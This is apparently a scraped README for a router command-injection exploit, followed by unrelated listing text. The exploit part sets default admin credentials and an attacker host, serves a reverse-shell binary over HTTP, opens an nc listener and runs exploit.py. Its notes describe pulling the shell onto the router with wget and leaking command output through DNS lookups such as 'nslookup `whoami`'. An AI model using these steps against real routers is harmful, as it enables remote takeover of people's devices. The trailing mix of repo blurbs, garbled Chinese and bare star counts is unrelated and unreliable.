# Install the requirements.
pip install -r requirements.txt
ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin
ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141
# Start HTTP server in order to serve the reverse shell executable.cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT
Leads for leaking command output
Look for file paths that are displayed within the web interface that command output can be written to. Using /tmp/ping.log to view the output at /Ping.asp.
Use wget to download reverse shell binary to the router.
Config the attacker as the DNS server and force the router to issue DNS requests with the command output. Like nslookup `whoami`.fake.domain
TODOs
Use argparse and make the exploit an executable.
Unsolved Mysteries
If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?
A ๐ to repo would be delightful, just do it โ๏ธ it is inexpensive. All Assignments , Quizzes and Exam papers at one place with clean and elegant solut
RpkConverter This tool is used to convert rpk file to Anki apkg. ๅฆๆ้ๅฐไปปไฝ้ฎ้ข๏ผ่ฏทๅ่ตทissue๏ผๅนถๆ่ฟฐๆ ๅตใๅฆๆ่ฝฌๆขrpkๅบ็ฐ้ฎ้ข๏ผ่ฏทๅฐๆไปถๅๅฐ้ฎ็ฎฑ ssqyang [AT] outlook.com๏ผๆไผdebugๅนถไฟฎๅค้ฎ้ขใ ไธ
3 Apr 23, 2022
5 Nov 05, 2022
3 Sep 30, 2022
13 May 10, 2022
11 Nov 08, 2022
2 Nov 16, 2022
16 Dec 05, 2022
1 Dec 18, 2021
9 Nov 01, 2021
353 Jan 04, 2023
391 Jan 01, 2023
93 Jan 08, 2023
74 Sep 13, 2022
46 Dec 09, 2022
7 Jul 21, 2022
2 May 31, 2022
1 Feb 08, 2022
5 Jan 12, 2022
13 Oct 09, 2022
91 Dec 07, 2022